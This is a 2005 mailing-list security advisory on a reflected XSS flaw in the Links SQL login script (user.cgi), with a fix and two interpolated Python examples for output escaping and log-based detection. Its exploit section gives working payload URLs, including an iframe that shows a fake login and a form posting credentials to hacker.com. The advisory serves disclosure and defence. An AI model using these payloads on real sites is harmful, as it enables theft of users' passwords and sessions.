[Full-disclosure] Gossamer Threads Links SQL login XSS Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Gossamer Threads Links SQL login XSS Vulnerability
- From: "Nathan House" <nhouse@xxxxxxxxxxxx>
- Date: Thu, 5 May 2005 20:17:37 -0000 (GMT)
Gossamer Threads Links SQL login XSS Vulnerability

Class:               Input Validation XSS
Remote:              Yes
Local:               Yes
Published / Updated: 04th May 2005
Vulnerable
Vulnerable: Gossamer Threads Links SQL v3.0
+ Links SQL 2.x
+ Links SQL 2.2.x
+ Links SQL 3.0
Not Vulnerable
-
Discussion
Links SQL is a perl/mod_perl/PHP web application written by Gossamer Threads
and is used to build any type of directory. Although designed to manage
links, Links SQL is very customisable and is used all over the Internet for a
wide range of tasks such as Image Galleries, Press Releases,
Yellowpages, Company Directories, and other categorised databases.
The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a
hidden field in the login form and can be passed directly to user.cgi
in the form of user.cgi?url="xyz".
The URL variable is client side input created by the browser when a user clicks
on a link which requires authentication.
After authentication the user is redirected to the URL held in the URL variable.
user.cgi does not sufficiently validate this client side input before writing it
back into the login form, so the URL variable is vulnerable to script injection
and cross site scripting (XSS) attacks.
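The reflection described above, modelled as an added example (not Gossamer Threads' code): a hidden "url" field filled from the request's url parameter, rendered once without encoding and once with HTML attribute encoding, plus a redirect-target check of the kind a fixed login handler would want. The function names, the sample URLs and the policy of allowing only root-relative paths are assumptions for illustration.

```python
# Added example, not the Links SQL source. Shows why an unencoded hidden field
# lets attribute-breaking input inject markup, and what the hardened form looks like.
import html
from urllib.parse import urlsplit


def render_hidden_url_unescaped(url_param: str) -> str:
    """Vulnerable rendering: the parameter is pasted straight into the attribute."""
    return '<input type="hidden" name="url" value="%s" />' % url_param


def render_hidden_url_escaped(url_param: str) -> str:
    """Hardened rendering: encode quotes, <, > and & so the value stays inside
    the attribute and can never start a new tag."""
    return '<input type="hidden" name="url" value="%s" />' % html.escape(url_param, quote=True)


def is_safe_redirect_target(url_param: str) -> bool:
    """Policy assumed for illustration: only root-relative paths on this site are
    acceptable post-login redirects. Absolute URLs, scheme-relative (//host)
    URLs, pseudo-schemes such as javascript: and control characters are refused."""
    if not url_param or any(ord(c) < 0x20 for c in url_param):
        return False
    parts = urlsplit(url_param)
    if parts.scheme or parts.netloc:
        return False
    return url_param.startswith("/") and not url_param.startswith("//")


if __name__ == "__main__":
    # Constructed input shaped like the advisory's first example.
    payload = '"><script>alert("XSS Vulnerability")</script><"'
    print(render_hidden_url_unescaped(payload))
    print(render_hidden_url_escaped(payload))
    for candidate in ("/cgi-bin/links/rate.cgi?ID=5", "http://www.example.invalid/login", "//example.invalid/x"):
        print(candidate, is_safe_redirect_target(candidate))
```

Encoding on output is the fix for the injection; validating the redirect target is a separate control that stops the same parameter being used to send an authenticated user to an arbitrary site. Both belong in the handler, because the hidden field is reflected before the redirect ever happens.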
Exploit
This is a standard XSS vulnerability.
Note an attacker would normally obfuscate the linking code but for these
examples I have made it simple for the sake of understanding.
Simple Example 1 (Pop up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate
Resulting in the following HTML being injected:
<input type="hidden" name="url" value=""><script>alert("XSS Vulnerability")</script><"" />
Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from=rate
Example 2 produces an invisible iframe presenting a fake login screen to
collect usernames and passwords, with HTML such as the following injected:
<form action="http://hacker.com/getusernameandpassword.cgi" method="post">
The <script> content is limited only by the imagination of the attacker; the
above are just two examples.
Like all XSS vulnerabilities this is an attack on the user only and not on
the system (Links SQL). However, if the user happens to be the Links SQL
moderator/admin, this user attack could be used to escalate privilege and
then attack Links SQL itself.
To exploit this XSS vulnerability the victim must be tricked into making the
above or another carefully crafted HTTP request. There are several ways
users can be tricked into doing this, but common methods include a link in an
HTML aware email, a web based forum (such as the Gossamer Threads forum) or a
link embedded in a malicious web page.
XSS attacks are often demonstrated harvesting cookies to perform session
hijacking and gather other sensitive information.
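Detection logic for the request shape described in this section, as an added example that is not part of the advisory: it parses Apache-style access log lines, URL-decodes the url parameter of user.cgi requests and flags values containing attribute-breaking characters. The log lines, IP addresses and the attacker.invalid host name are constructed for the example; the decode-twice step is an assumption to cover double-encoded submissions.

```python
# Added example, not from the advisory. Flags user.cgi requests whose url
# parameter contains characters that can break out of the hidden field.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined-log prefix: client, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic). Line 1 is a benign login redirect,
# lines 2 and 3 follow the shapes of the advisory's two examples, line 4 is a
# different script with markup in a different parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [05/May/2005:20:17:37 +0000] "GET /cgi-bin/links/user.cgi?url=/cgi-bin/links/rate.cgi%3FID%3D5&from=rate HTTP/1.1" 200 1432
203.0.113.9 - - [05/May/2005:20:18:02 +0000] "GET /cgi-bin/links/user.cgi?url=%22%3E%3Cscript%3Ealert(%22XSS%20Vulnerability%22)%3C/script%3E%3C%22&from=rate HTTP/1.1" 200 1602
203.0.113.9 - - [05/May/2005:20:18:40 +0000] "GET /cgi-bin/links/user.cgi?url=%22%3E%3Ciframe%20src=%22http://attacker.invalid/linksql.html%22%3E%3C/iframe%3E%3C!--&from=rate HTTP/1.1" 200 1980
198.51.100.2 - - [05/May/2005:20:19:11 +0000] "GET /cgi-bin/links/search.cgi?query=%3Cb%3Ebold%3C/b%3E HTTP/1.1" 200 900
"""

# Characters that end the value="..." attribute or open a tag.
SUSPECT_CHARS = ('"', "<", ">")


def suspicious_url_param(target: str) -> bool:
    """True when a user.cgi request carries a url parameter with markup characters."""
    parts = urlsplit(target)
    if not parts.path.endswith("/user.cgi"):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)  # parse_qs percent-decodes once
    for value in query.get("url", []):
        decoded = unquote(value)  # second decode catches double-encoded payloads (assumption)
        if any(c in decoded for c in SUSPECT_CHARS):
            return True
    return False


def scan_log(text: str) -> list:
    """Return (client_ip, request_target) for each suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if suspicious_url_param(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(ip, target)
```

The check is deliberately narrow (one script, one parameter) so it can run as a rule against existing logs while an upgrade is scheduled; a benign redirect target never needs a quote or angle bracket, so these characters are a low-noise signal for this parameter.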
Solution
A new release has been created to fix this problem. Upgrade to Gossamer Links 3.0.1:
http://www.gossamer-threads.com/forum/Gossamer_Links_3.0.1_Released_P280986/
http://gossamer-threads.com/perl/gforum/gforum.cgi?post=281029;
Credit
Nathan House @ StationX
References
http://www.stationx.net
http://www.stationx.net/advisories.php
http://www.gossamer-threads.com/scripts/links-sql/index.htm
Legal Notice
Copyright (©) 2005 StationX (UK) Ltd, referred to as "StationX" from here on.
This advisory written by StationX can be distributed freely electronically
without permission from StationX. This advisory may not be altered
without the express written permission of StationX. If you wish to print this
advisory in whole or in part in any non-electronic form please contact
StationX for consent.
Disclaimer
This advisory, to the best of our knowledge and given current information, is
correct and accurate at the date given above under "Published / Updated". Use
of any information in this advisory is for informational purposes only, to help
further the development of the security industry and help further
secure systems. The information in the advisory should NOT be used adversely.
StationX, the author and any publishers give no guarantees or
warranties at all with regard to any information in this advisory. Under no
circumstances shall StationX, the author or any publishers be liable
in contract, tort, or otherwise, for any loss or damage whatsoever arising from
use of or in any way connected with this advisory or any hyperlinked
website, including, without limitation, damages for loss of business, loss of
profits, business interruption, loss of business information, loss of
programs or other data on the user's information handling system or otherwise
maintained, or any other pecuniary loss (even where StationX, the
author or any publishers have been advised of the possibility of such loss or
damage arising).
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/